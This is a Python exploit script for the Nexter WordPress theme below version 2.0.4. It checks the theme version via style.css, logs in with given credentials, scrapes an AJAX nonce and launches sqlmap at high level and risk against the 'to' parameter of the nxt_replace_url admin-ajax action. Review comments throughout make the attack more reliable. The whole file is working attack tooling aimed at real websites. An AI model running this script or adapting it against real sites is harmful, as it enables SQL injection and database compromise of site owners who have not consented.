import os
import click
import argparse
import requests
import subprocess
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every request in this file is sent with verify=False (targets are often behind
# self-signed TLS), so silence urllib3's per-request InsecureRequestWarning once.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Module-level session. sendem() builds its own session, so this one is not used
# by the functions below; it is kept because it is part of the module namespace.
session = requests.Session()

# Optional upstream proxy, e.g. "http://127.0.0.1:8080" to watch the traffic in an
# intercepting proxy. Left empty, it is meant to leave proxying off -- presumably
# requests ignores empty *_PROXY variables; set a URL here to route through one.
http_proxy = ""
os.environ.update(HTTP_PROXY=http_proxy, HTTPS_PROXY=http_proxy)

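def _version_tuple(version):
    """Turn a dotted version string such as ``'2.0.4'`` into ``(2, 0, 4)``.

    Parsing stops at the first component that does not start with digits
    (``'2.0.4-beta'`` -> ``(2, 0, 4)``). A string with no leading numeric
    component yields an empty tuple, which the caller treats as "unparseable".
    """
    parts = []
    for piece in version.split('.'):
        match = re.match(r'\d+', piece)
        if match is None:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def _extract_version(css_text):
    """Return the version string from a style.css header block, or ``None``.

    Looks for the ``Stable tag:`` line the original script expected and falls
    back to the ``Version:`` header that WordPress theme style.css files
    conventionally carry. NOTE(review): which of the two the Nexter theme
    actually ships is not visible here -- confirm against a real style.css.
    """
    lines = [line.strip() for line in css_text.splitlines()]
    for prefix in ('Stable tag:', 'Version:'):
        for line in lines:
            if line.startswith(prefix):
                return line.partition(':')[2].strip()
    return None


def version_check(wordpress_url):
    """Fetch the Nexter theme's style.css and decide whether the target is worth attacking.

    Args:
        wordpress_url: Base URL of the WordPress site (scheme + host, optional path).

    Returns:
        True when the theme reports a version below 2.0.4; the caller then goes
        on to log in and start sqlmap.

    Raises:
        SystemExit: when the theme is not installed (non-200 on style.css), the
            version header is missing or unparseable, or the version is 2.0.4 or
            above -- every case where continuing would be pointless.
        requests.RequestException: propagated from the HTTP request; there is no
            retry here.
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
    # rstrip avoids "https://host//wp-content/..." when the user passes a trailing slash.
    plugin_url = wordpress_url.rstrip('/') + "/wp-content/themes/nexter/style.css"
    # verify=False matches the rest of the script (self-signed targets); the
    # resulting urllib3 warning is silenced at module import.
    response = requests.get(plugin_url, headers=headers, verify=False, timeout=30)
    if response.status_code != 200:
        print("Plugin not installed")
        raise SystemExit(1)

    version = _extract_version(response.text)
    if version is None:
        print("Failed to find the version information in the style.css file.")
        raise SystemExit(1)

    parsed = _version_tuple(version)
    if not parsed:
        # Say so instead of guessing: the original's string comparison would have
        # silently classified any non-numeric value as "2.0.4 or above".
        print(f"Could not parse the theme version {version!r}.")
        raise SystemExit(1)

    # Compare numerically. The original compared strings, which put "2.0.10"
    # *below* "2.0.4" and "10.0.0" below "2.0.4".
    if parsed >= _version_tuple('2.0.4'):
        print("The theme version is 2.0.4 or above.")
        raise SystemExit(1)
    print("The theme version is below 2.0.4.")
    return True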






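def hack_em(username, password, wordpress_url, nonce, cookies):
    """Hand the authenticated ``nxt_replace_url`` admin-ajax request to sqlmap and stream its output.

    Args:
        username, password: accepted for signature compatibility only; sqlmap
            authenticates with the session cookies, so they are unused here.
        wordpress_url: base URL of the target site.
        nonce: the ``ajax_nonce`` value scraped from the logged-in admin page.
        cookies: the logged-in session's cookie jar (anything exposing ``.items()``).

    Side effects:
        Spawns ``sqlmap`` (must be on PATH) and prints each line of its output;
        prints a diagnostic if sqlmap is missing or exits non-zero. Never raises
        for a failed scan.
    """
    cookie_string = "; ".join(f"{name}={value}" for name, value in cookies.items())
    base = wordpress_url.rstrip('/')
    # Argument list with shell=False. Every value below is either operator input
    # or data returned by the *target* (cookie names/values, the scraped nonce);
    # the original shell string let a hostile target inject commands on the
    # operator's own machine via a crafted Set-Cookie or nonce.
    command = [
        'sqlmap',
        '-u', f'{base}/wp-admin/admin-ajax.php',
        f'--data=action=nxt_replace_url&nexter_nonce={nonce}&from=test&to=test2&case=no',
        f'--referer={base}/wp-admin/admin.php?page=nexter_extra_options',
        '--level', '5',
        '--risk', '3',
        '--threads', '4',
        '-p', 'to',
        '--dbms=mysql',
        '--random-agent',
        '--cookie', cookie_string,
    ]
    try:
        with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                              universal_newlines=True) as process:
            # Stream output line by line so long scans are visible as they run.
            for line in process.stdout:
                print(line.strip())
            returncode = process.wait()
    except FileNotFoundError:
        # Popen never raises CalledProcessError (the original handler was dead
        # code); a missing binary is the failure that actually surfaces here.
        print("sqlmap was not found on PATH; install it or add it to PATH.")
        return

    if returncode != 0:
        print(f"Command execution failed with error code {returncode}.")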
 

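def sendem(username, password, wordpress_url):
    """Log in to WordPress, scrape the ``ajax_nonce`` and launch the sqlmap run.

    Args:
        username, password: credentials of a WordPress user. NOTE(review): the
            script does not show which role ``nxt_replace_url`` requires; the
            referer used later points at an admin options page, so assume an
            administrator until confirmed.
        wordpress_url: base URL of the site.

    Side effects:
        Performs the login over a fresh ``requests.Session`` and, on success,
        calls ``hack_em`` (which spawns sqlmap). Exits the process when the login
        fails or no nonce can be scraped.
    """
    base = wordpress_url.rstrip('/')
    session = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    # Keep the session consistent with version_check(): accept self-signed
    # certificates and never block forever on an unresponsive host.
    session.verify = False
    timeout = 30

    login_url = base + '/wp-login.php'
    # The first GET seeds the cookie jar that the login POST is expected to send
    # back (see the 'testcookie' field below); the session carries it automatically.
    session.get(login_url, timeout=timeout)

    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': base + '/wp-admin/',
        'testcookie': '1',
    }
    login_response = session.post(login_url, data=login_data, timeout=timeout)

    if not any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        # The original returned silently here, so a bad password looked like a
        # successful run that simply did nothing.
        print("Login failed: no wordpress_logged_in cookie was set (check the credentials).")
        raise SystemExit(1)

    # The nonce is scraped from inline script on the post-login page; the pattern
    # is kept as-is from the original. NOTE(review): the script that exposes
    # "ajax_nonce" is not visible here -- if the theme renames it, this fails.
    match = re.search(r'"ajax_nonce":"(.*?)"', login_response.text)
    if match is None:
        print("Nonce not found.")
        raise SystemExit(1)

    nonce = match.group(1)
    print("Nonce:", nonce)
    hack_em(username, password, base, nonce, session.cookies)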

        

      

    


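if __name__ == "__main__":
    import getpass

    parser = argparse.ArgumentParser(
        description="Nexter theme: check the installed version, log in, and drive "
                    "sqlmap against the nxt_replace_url admin-ajax action.")
    parser.add_argument("-w", "--url", required=True,
                        help="Base URL of the WordPress site, e.g. https://example.com")
    parser.add_argument("-u", "--username", required=True,
                        help="Username of the WordPress user to log in as")
    # Optional on purpose: a password given on the command line lands in shell
    # history and process listings. Omit it to be prompted without echo.
    parser.add_argument("-p", "--password",
                        help="Password of that WordPress user (prompted if omitted)")
    args = parser.parse_args()

    # Trailing slashes would otherwise yield '//wp-content/...' style URLs.
    wordpress_url = args.url.rstrip('/')
    username = args.username
    password = args.password if args.password is not None else getpass.getpass("WordPress password: ")

    # version_check() exits the process unless the theme reports a version below 2.0.4.
    version_check(wordpress_url)
    sendem(username, password, wordpress_url)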